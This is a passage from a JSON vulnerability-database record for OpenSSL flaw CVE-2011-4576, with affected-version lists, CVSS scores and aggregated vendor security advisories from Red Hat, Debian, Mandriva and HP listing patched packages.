{ "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:bogus:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.0e", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2011-4576" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "109788" } ], "trust": 0.4 }, "cve": "CVE-2011-4576", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 5.0, "confidentialityImpact": "Partial", "exploitabilityScore": null, "id": "CVE-2011-4576", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2011-4576", "trust": 1.8, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2011-4576", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2011-4576" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "NVD", "id": "CVE-2011-4576" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. \nAn attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nMultiple numeric conversion errors, leading to a buffer overflow, were\nfound in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data\nfrom BIO (OpenSSL\u0027s I/O abstraction) inputs. Specially-crafted DER\n(Distinguished Encoding Rules) encoded data read from a file or other BIO\ninput could cause an application using the OpenSSL library to crash or,\npotentially, execute arbitrary code. \n\nWarning: Before applying this update, back up your JBoss Enterprise\nApplication Platform\u0027s \"server/[PROFILE]/deploy/\" directory, along with all\nother customized configuration files. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting JBoss Enterprise Application Platform installation (including all\napplications and configuration files). \n\nJBoss server instances configured to use the Tomcat Native library must be\nrestarted for this update to take effect. \nHP System Management Homepage (SMH) before v7.1.1 running on Linux and\nWindows. HP System Management Homepage v7.1.1 is available here:\n\nHP System Management Homepage for Windows x64\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab\n0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Windows x86\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7\nc0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (AMD64/EM64T)\n\n[Download here] or enter the following URL into the browser address window. \n\nhttp://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail\ns/?sp4ts.oid=4091409\u0026spf_p.tpst=psiSwdMain\u0026spf_p.prp_psiSwdMain=wsrp-navigati\nonalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa\nmeId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18\nd373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument\u0026javax.p\nortlet.begCacheTok=com.vignette.cachetoken\u0026javax.portlet.endCacheTok=com.vign\nette.cachetoken\n\nHP System Management Homepage for Linux (x86)\n\n[Download here] or enter the following URL into the browser address window. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: rhev-hypervisor5 security and bug fix update\nAdvisory ID: RHSA-2012:0168-01\nProduct: Red Hat Enterprise Virtualization\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2012-0168.html\nIssue date: 2012-02-21\nCVE Names: CVE-2011-4109 CVE-2011-4576 CVE-2011-4619 \n CVE-2012-0029 CVE-2012-0207 \n=====================================================================\n\n1. Summary:\n\nAn updated rhev-hypervisor5 package that fixes several security issues and\nvarious bugs is now available. \n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRHEV Hypervisor for RHEL-5 - noarch\n\n3. Description:\n\nThe rhev-hypervisor5 package provides a Red Hat Enterprise Virtualization\nHypervisor ISO disk image. The Red Hat Enterprise Virtualization\nHypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. \nIt includes everything necessary to run and manage virtual machines: A\nsubset of the Red Hat Enterprise Linux operating environment and the Red\nHat Enterprise Virtualization Agent. \n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for\nthe Intel 64 and AMD64 architectures with virtualization extensions. \n\nA heap overflow flaw was found in the way QEMU-KVM emulated the e1000\nnetwork interface card. A privileged guest user in a virtual machine whose\nnetwork interface is configured to use the e1000 emulated driver could use\nthis flaw to crash the host or, possibly, escalate their privileges on the\nhost. (CVE-2012-0029)\n\nA divide-by-zero flaw was found in the Linux kernel\u0027s igmp_heard_query()\nfunction. An attacker able to send certain IGMP (Internet Group Management\nProtocol) packets to a target system could use this flaw to cause a denial\nof service. (CVE-2012-0207)\n\nA double free flaw was discovered in the policy checking code in OpenSSL. \nA remote attacker could use this flaw to crash an application that uses\nOpenSSL by providing an X.509 certificate that has specially-crafted\npolicy extension data. (CVE-2011-4109)\n\nAn information leak flaw was found in the SSL 3.0 protocol implementation\nin OpenSSL. \n(CVE-2011-4576)\n\nIt was discovered that OpenSSL did not limit the number of TLS/SSL\nhandshake restarts required to support Server Gated Cryptography. A remote\nattacker could use this flaw to make a TLS/SSL server using OpenSSL consume\nan excessive amount of CPU by continuously restarting the handshake. \n(CVE-2011-4619)\n\nRed Hat would like to thank Nicolae Mogoreanu for reporting CVE-2012-0029,\nand Simon McVittie for reporting CVE-2012-0207. \n\nThis updated package provides updated components that include fixes for\nvarious security issues. These issues have no security impact on Red Hat\nEnterprise Virtualization Hypervisor itself, however. The security fixes\nincluded in this update address the following CVE numbers:\n\nCVE-2006-1168 and CVE-2011-2716 (busybox issues)\n\nCVE-2009-5029, CVE-2009-5064, CVE-2010-0830 and CVE-2011-1089 (glibc\nissues)\n\nCVE-2011-1083, CVE-2011-3638, CVE-2011-4086, CVE-2011-4127 and\nCVE-2012-0028 (kernel issues)\n\nCVE-2011-1526 (krb5 issue)\n\nCVE-2011-4347 (kvm issue)\n\nCVE-2010-4008, CVE-2011-0216, CVE-2011-2834, CVE-2011-3905, CVE-2011-3919\nand CVE-2011-1944 (libxml2 issues)\n\nCVE-2011-1749 (nfs-utils issue)\n\nCVE-2011-4108 (openssl issue)\n\nCVE-2011-0010 (sudo issue)\n\nCVE-2011-1675 and CVE-2011-1677 (util-linux issues)\n\nCVE-2010-0424 (vixie-cron issue)\n\nThis updated rhev-hypervisor5 package fixes various bugs. Documentation of\nthese changes will be available shortly in the Technical Notes document:\n\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to this updated package, which fixes these issues. \n\n4. Solution:\n\nBefore applying this update, make sure all previously-released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/kb/docs/DOC-11259\n\n5. Bugs fixed (http://bugzilla.redhat.com/):\n\n606191 - after upgrade , reboot can\u0027t shut off network successfully and back to firstboot menu again\n627538 - System will not boot sometimes when using rhevm to do upgrade twice. \n650179 - rhevm bridge came up instead of breth0 after fail to configure network\n675325 - Changes to networking always clear the contents of resolv.conf\n696875 - RHEVH bootup hanging in ovirt-early when doing LVM scanning\n717535 - [RFE] No confirm message for ntp server setting\n728895 - RHEV-H rpm should include a versions text file\n732948 - CCISS: Auto install fail at creating physical volume. \n734110 - rhevh - upgrade ovirt node fails due to nonexistent breth0\n734480 - [RFE] Add virt-who package to RHEVH\n734710 - Register RHN satellite will fail if RHN satellite password include space. \n740127 - Provide our CPE name in a new system file\n743938 - Make rhev-hypervisor RPM multi-installable like the kernel\n747519 - RHEV-H 5.8 register to RHN will fail. \n747647 - Change rhev-hypervisor RPM to be rhev-hypervisor5 to allow coinstallations with rhev-hypervisor6\n756178 - remove redundant brcm-iscsi.log rotation from ovirt-node now that it is in iscsi-initiator-utils\n758465 - RHEV-H 5.8 register to RHN will fail if password contains quotes or spaces\n759462 - Can not retrieve running guests UUID in RHEVH node. \n759632 - virt-who debugging output going to stderr always\n759635 - Revert workaround of virt-who output\n761357 - Multipathd service is stopped by default cause change password failed in single mode. \n768256 - network layout is incorrect when configure network with nic up\n771771 - CVE-2011-4109 openssl: double-free in policy checks\n771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding\n771780 - CVE-2011-4619 openssl: SGC restart DoS attack\n772075 - CVE-2012-0029 qemu-kvm: e1000: process_tx_desc legacy mode packets heap overflow\n772867 - CVE-2012-0207 kernel: igmp: Avoid zero delay when receiving odd mixture of IGMP queries\n783625 - The setup command should only allow password setting and viewing logs in single mode. \n\n6. Package List:\n\nRHEV Hypervisor for RHEL-5:\n\nnoarch:\nrhev-hypervisor5-5.8-20120202.0.el5.noarch.rpm\nrhev-hypervisor5-tools-5.8-20120202.0.el5.noarch.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. References:\n\nhttps://www.redhat.com/security/data/cve/CVE-2011-4109.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4576.html\nhttps://www.redhat.com/security/data/cve/CVE-2011-4619.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0029.html\nhttps://www.redhat.com/security/data/cve/CVE-2012-0207.html\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://docs.redhat.com/docs/en-US/Red_Hat_Enterprise_Virtualization_for_Servers/2.2/html/Technical_Notes/index.html\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2012 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.4 (GNU/Linux)\n\niD8DBQFPQ1yHXlSAg2UNWIIRAl9/AJ9JmPpSO5U2xwDBKDZA8y5To8EVcwCfZFGN\nbzF952CZ/r5T3LUF9kY6X8c=\n=IdNq\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. The Common Vulnerabilities and\nExposures project identifies the following vulnerabilities:\n\nCVE-2011-4108\n\tThe DTLS implementation performs a MAC check only if certain\n\tpadding is valid, which makes it easier for remote attackers\n\tto recover plaintext via a padding oracle attack. \n\nCVE-2011-4109 \n\tA double free vulnerability when X509_V_FLAG_POLICY_CHECK is\n\tenabled, allows remote attackers to cause applications crashes\n\tand potentially allow execution of arbitrary code by\n\ttriggering failure of a policy check. \n\nCVE-2011-4354\n\tOn 32-bit systems, the operations on NIST elliptic curves\n\tP-256 and P-384 are not correctly implemented, potentially\n\tleaking the private ECC key of a TLS server. \n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 0.9.8g-15+lenny15. \n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 0.9.8o-4squeeze5. \n\nFor the testing distribution (wheezy) and the unstable distribution\n(sid), these problems have been fixed in version 1.0.0f-1. \n\nWe recommend that you upgrade your openssl packages. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4108\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4109\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4576\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4619\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0027\n http://www.openssl.org/news/secadv_20120104.txt\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Linux 2011:\n 2291c13c44539a5e25f58750a5d6bf8f 2011/i586/libopenssl1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm\n c610330d2c4c7397feb126247b1fa94f 2011/i586/libopenssl-devel-1.0.0d-2.2-mdv2011.0.i586.rpm\n 36c86a84320e1c8a17a74e4e68bc7d5a 2011/i586/libopenssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.i586.rpm\n 4b8054f2c169d2b3223195053bd15802 2011/i586/libopenssl-static-devel-1.0.0d-2.2-mdv2011.0.i586.rpm\n 3c48b209b941a83a6acfef439c3f78b7 2011/i586/openssl-1.0.0d-2.2-mdv2011.0.i586.rpm \n 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm\n\n Mandriva Linux 2011/X86_64:\n 21a50bd2be83839266f033c9a0f0fabc 2011/x86_64/lib64openssl1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n 7e80ee8e2d445c5f1985cd52d2316658 2011/x86_64/lib64openssl-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n e1f4faa3162a6bbc14b37e4cb8d1e8e2 2011/x86_64/lib64openssl-engines1.0.0-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n 6e3ac6d57cf0f4e13ed8e275a9bd2ff8 2011/x86_64/lib64openssl-static-devel-1.0.0d-2.2-mdv2011.0.x86_64.rpm\n e9e0306f8dc9f398915a646547e262e2 2011/x86_64/openssl-1.0.0d-2.2-mdv2011.0.x86_64.rpm \n 7af9d175d066db069aeb82248df9772b 2011/SRPMS/openssl-1.0.0d-2.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\nNow, if no valid disks are found for Hypervisor installation, a message is\ndisplayed informing the user that there are no valid disks for\ninstallation. (BZ#781471)\n\n* Previously, the user interface for the Hypervisor did not indicate\nwhether the system was registered with Red Hat Network (RHN) Classic or RHN\nSatellite. As a result, customers could not easily determine the\nregistration status of their Hypervisor installations. \n\nThe TUI has been updated to display the registration status of the\nHypervisor. (BZ#788223)\n\n* Previously, autoinstall would fail if the firstboot or reinstall options\nwere passed but local_boot or upgrade were not passed. Now, neither the\nlocal_boot or upgrade parameters are required for autoinstall. \n788225 - autoinstall fails when local_boot or upgrade not passed on command line\n788226 - rhev-hypervisor6 6.2 Update 2 Release bugzilla\n\n6. \n\nRelease Date: 2012-01-19\nLast Updated: 2012-01-19\n\n ------------------------------------------------------------------------------\n\nPotential Security Impact: Remote Denial of Service (DoS), unauthorized access\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nA potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3\nCVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided upgrades to resolve this vulnerability. \nThe upgrades are available from the following location\nftp://ossl098s:Secure12@ftp.usa.hp.com\n\nHP-UX Release / Depot Name\n\nB.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08s or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.11\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.001 or subsequent\n\nHP-UX B.11.23\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.002 or subsequent\n\nHP-UX B.11.31\n==================\nopenssl.OPENSSL-CER\nopenssl.OPENSSL-CONF\nopenssl.OPENSSL-DOC\nopenssl.OPENSSL-INC\nopenssl.OPENSSL-LIB\nopenssl.OPENSSL-MAN\nopenssl.OPENSSL-MIS\nopenssl.OPENSSL-PRNG\nopenssl.OPENSSL-PVT\nopenssl.OPENSSL-RUN\nopenssl.OPENSSL-SRC\naction: Install revision A.00.09.08s.003 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) 19 January 2012 Initial release\n\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in the title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2012 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners", "sources": [ { "db": "NVD", "id": "CVE-2011-4576" }, { "db": "CERT/CC", "id": "VU#737740" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "BID", "id": "51281" }, { "db": "VULMON", "id": "CVE-2011-4576" }, { "db": "PACKETSTORM", "id": "116824" }, { "db": "PACKETSTORM", "id": "116826" }, { "db": "PACKETSTORM", "id": "114272" }, { "db": "PACKETSTORM", "id": "110012" }, { "db": "PACKETSTORM", "id": "108700" }, { "db": "PACKETSTORM", "id": "113582" }, { "db": "PACKETSTORM", "id": "108735" }, { "db": "PACKETSTORM", "id": "109788" }, { "db": "PACKETSTORM", "id": "109073" } ], "trust": 3.51 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4576", "trust": 3.2 }, { "db": "CERT/CC", "id": "VU#737740", "trust": 2.2 }, { "db": "SECUNIA", "id": "48528", "trust": 1.1 }, { "db": "SECUNIA", "id": "57353", "trust": 1.1 }, { "db": "SECUNIA", "id": "55069", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU91284469", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU92046435", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001019", "trust": 0.8 }, { "db": "JUNIPER", "id": "JSA10659", "trust": 0.3 }, { "db": 